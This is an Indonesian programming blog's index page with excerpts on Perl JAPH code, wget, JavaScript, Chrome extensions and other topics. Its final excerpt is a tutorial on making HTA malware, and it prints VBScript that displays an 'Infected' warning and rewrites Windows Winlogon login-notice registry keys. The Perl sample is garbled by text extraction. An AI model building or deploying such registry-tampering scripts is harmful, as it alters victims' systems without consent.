Just another Perl hacker

Just another Perl Hacker, atau JAPH adalah program yang ditulis dengan bahasa Perl hanya untuk mencetak tulisan “Just another Perl hacker,” (koma tidak selalu digunakan) Berikut ini beberapa program perl yang hanya akan mencetak tulisan “Just another Perl hacker,” dengan berbagai cara sekaligus dengan pola kode yang unik. Unta %% #Erudil from http://www.perlmonks.com/ #!/usr/bin/perl -w # camel code use strict; $_='ev al("seek40D ATA,0, 0;");foreach(1..3) {<DATA>;}my @camel1hump;my$camel; my$Camel ;while( <DATA>){$_=sprintf("%-6 9s",$_);[email protected] 1=split(//);if(defined($ _=<DATA>)){@camel1hum p=split(//);}while(@dromeda ry1){my$camel1hump=0 ;my$CAMEL=3;if(defined($_=shif t(@dromedary1 ))&&/S/){$camel1hump+=1<<$CAMEL;} $CAMEL--;if(d efined($_=shift(@dromedary1))&&/S/){ $camel1hump+=1 <<$CAMEL;}$CAMEL--;if(defined($_=shift( @camel1hump))&&/S/){$camel1hump+=1<<$CAMEL;}$CAMEL--;if( defined($_=shift(@camel1hump))&&/S/){$camel1hump+=1<<$CAME L;;}$camel.=(split(//,"40..m`{/J47134}L^7FX"))[$camel1h ump];}$camel.="n";}@camel1hump=split(/n/,$camel);foreach(@ camel1hump){chomp;$Camel=$_;y/LJF7173175`47/616263 06465666770/;y/12345678/JL7F17517347`/;$_=reverse; print"$_40$Cameln";}foreach(@camel1hump){chomp;$Camel=$_;y /LJF7173175`47/12345678/;y/12345678/JL7F175173 47`/; $_=reverse;print"40$_$Cameln";}';;s/s*//g;;eval; eval ("seek40DATA,0,0;");undef$/;$_=<DATA>;s/s*//g;( );;s ;^.*_;;;map{eval"print"$_"";}/.{4}/g; __DATA__ 124 1 5014540165163145401571...

Read More

Wget untuk Windows

Para pecinta Linux pasti sudah tidak asing lagi dengan software downloader dalam antarmuka teks (CLI). Ternyata wget juga tersedia juga untuk sistem operasi Windows, yang berbeda hanyalah pembuatnya :D. Cara penggunaannya pada Windows hampir sama dengan versi Linux, sehingga bagi yang masih awam bisa membaca dokumentasi wget versi linux. Misalkan saya ingin download file dari http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget.exe dengan membuat file log (catatan) dengan nama logs.txt dan output hasil download disimpan dengan nama wget.exe Perintahnya adalah wget http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget.exe -o logs.txt -O wget.exe Silakan download wget for Windows pada link dibawah ini http://users.ugent.be/~bpuype/wget/ Untuk informasi lebih lanjut silakan baca dokumentasinya disini...

Read More

Anonymous Function

Anonymous function adalah function yang tidak mempunyai nama, anonymous function sering digunakan untuk melewatkan parameter pada function lainnya atau untuk keperluan lain. Perhatikan potongan kode javascript berikut ini function hello() { alert('Saya bukan anonymous function'); } window.onload = hello(); Pada kode diatas saat event window.onload dijalankan yaitu saat dokumen sudah di-load, javascript akan memanggil function hello() dan akan menampilkan pesan. Cara penulisan kode tersebut dapat dipersingkat dengan anonymous function sebagai berikut window.onload = function() { alert('Saya adalah anonymous function'); } Kedua potongan kode tersebut memiliki fungsi yang sama, yaitu akan menampilkan suatu pesan saat dokumen ter-load. Sebaiknya gunakan cara...

Read More

Membuat Extension Google Chrome

Kali ini saya akan mencoba sharing tentang cara membuat extension buat browser Google Chrome walaupun saya sendiri masih belum ngerti banget. Saat Google Chrome pertama me-load extension, sebenarnya Google Chrome akan mencari satu file yang bernama manifest.json. File ini berisi informasi tentang extension tersebut dalam format pertukaran data JSON (Javascript Object Notation). Minimal sebuah extension harus menyertakan informasi berupa nama, versi, deskripsi, icon, dan file html yang akan ditampilkan. Kira-kira seperti ini isi dari file manifest.json { "name": "The Target Community", "version": "1.0", "description": "Extension Google Chrome pertama buatan saya.", "browser_action": { "default_icon": "icon.png", "popup": "index.html" } } Langsung...

Read More

Google Chrome Extension buat The Target

Extension ini berfungsi untuk melihat 10 thread terakhir dari forum The Target dan bisa di install baik di Windows maupun Linux. Kalau Google Chrome kamu tidak menggunakan bahasa inggris silakan menyesuaikan. Karena belum punya akun Google Chrome Webstore, jadi terpaksa pake cara manual 😀 Download dulu disini http://www.box.net/shared/1um3ji8rxeivl3rmxphz Cara install: 1. Extract file arsip ke lokasi sesuai keinginan, misalnya C:thetarget atau /home/user/thetarget 2. Buka Google Chrome, trus klik menu di sebelah kanan, lalu pilih Tools -> Extension 3. Klik menu +Developer mode di sebelah kanan 4. Klik tombol Load unpacked extension 5. Arahkan ke lokasi folder tujuan, kemudian klik...

Read More

Dennis Ritchie, Bapak Pemrograman Bahasa C Meninggal

Dunia kini telah kehilangan satu orang hebat lagi, setelah kepergian Steve Jobs, kini Dennis Ritchie, pembuat dari bahasa pemrograman yang digunakan luas di dunia, yaitu bahasa pemrograman C, tutup usia pada umur 70 tahun. Ritchie tutup usia di kediamannya, menurut sebuah post di Google+ milik Rob Pike. Sebuah entri di Wikipedia mengatakan dia meninggal di Murray Hill, New Jersey. Kepergiannya dikonfirmasi hari ini oleh Bell Labs, dalam sebuah pesan dari direkturnya, Jeong Kim kepada para pegawai. Dennis Ritchie juga memberi kontribusi besar pada sistem operasi Unix, dimana ia menerima Turing Award pada 1983, bersama koleganya Kenneth Thompson. Bill Clinton...

Read More

Kompres Javascript dengan JSPack

Program ini berfungsi untuk meng-kompres javascript, selain ukurannya jadi lebih kecil, kodenya juga gak mudah dibaca, jadi sekalian bisa buuat enkripsi. Pertama siapkan file Javascript ber-ekstensi *.js yang akan dikompres, kemudian buka software JSPack, pada menu Input klik tombol Browse dan arahkan pada file javascript yang akan dikompress, kemudian pada menu output klik tombol Browse dan pilih lokasi penyimpanan untuk hasil pengompressan, setelah itu klik tombol PACK. misal ada source code javascript seperti ini (4 KB) /** * * Base64 encode / decode * http://www.webtoolkit.info/ * **/ var Base64 = { // private property _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", // public...

Read More

Membuat Boneka Linux Sendiri dengan Kertas

Bagi pengguna Linux pasti sudah tidak asing lagi dengan gambar pingiun seperti gambar dibawah ini. Bagi yang belum tau, gambar dibawah ini adalah logo dari Sistem Operasi Linux buatan Linux Torvalds yang diberi nama Tux. Tulisan ini berisi langkah-langkah untuk membuat boneka linux/tux hanya dengan menggunakan kertas. Ikuti langkah-langkah dibawah ini 1. Cetak gambar ini kemudian gunting sesuai garis tepi 2. Ikuti langkah seperti gambar dibawah ini 3. Jadi deh...

Read More

Cara Membuat Screen Saver Sendiri

  Screen saver merupakan salah satu aplikasi bawaan windows. Dimana jika dalam interval waktu tertentu tidak ada kegiatan di komputer anda secara otomatis screen saver akan aktif. Bosan dengan screen saver yang itu-itu saja? Nah disini saya mau share cara bikin screen saver sendiri sesuai selera hati Bahan-bahan untuk membuat screen saver : 1. Software Pixifex Screenswift 2. File Gambar sesuai selera ( direkomendasikan dengan resolusi tinggi ) Bisa pake gambar ini untuk percobaan 😀 Tutorial ini akan dibagi menjadi 2 tahap, yaitu membuat Flash dan membuat Installer Tanpa banyak cingcong langsung aja kita mulai Tahap 1 : Membuat...

Read More

HTML Application Malware

Membuat malware tidak sebatas menggunakan extension *.EXE, *.COM, *.SCR, *.PIF, *.CMD, *.BAT, atau *.VBS saja. Ternyata ada extension lain yang bisa dimanfaatkan untuk membuat sebuah malware, yaitu *.HTA atau HTML Application. Pada dasarnya cara membuat malware dengan extension ini sama halnya dengan VBScript, hanya membutuhkan dua baris kode yang ditaruh di awal dan akhir baris pada tubuh malware tersebut. Contoh menggunakan VBS Set regkey = CreateObject("Wscript.Shell") MsgBox "Infected...!!!", vbCritical, "Warning" regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeText", "ag0y was here" regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeCaption", "Warning" self.close Jika menggunakan HTA maka akan menjadi seperti ini <script type="text/vbscript"> Set regkey = CreateObject("Wscript.Shell") MsgBox "Infected...!!!", vbCritical, "Warning"...

Read More

Follow Us

Gabung Bersama Ribuan Pembaca Kami!

Daftarkan email anda untuk mendapatkan panduan teknologi terbaru dari Situstarget.com.

Proses pendaftaran hampir selesai, mohon cek email Anda dan Klik tombol konfirmasi.

Pin It on Pinterest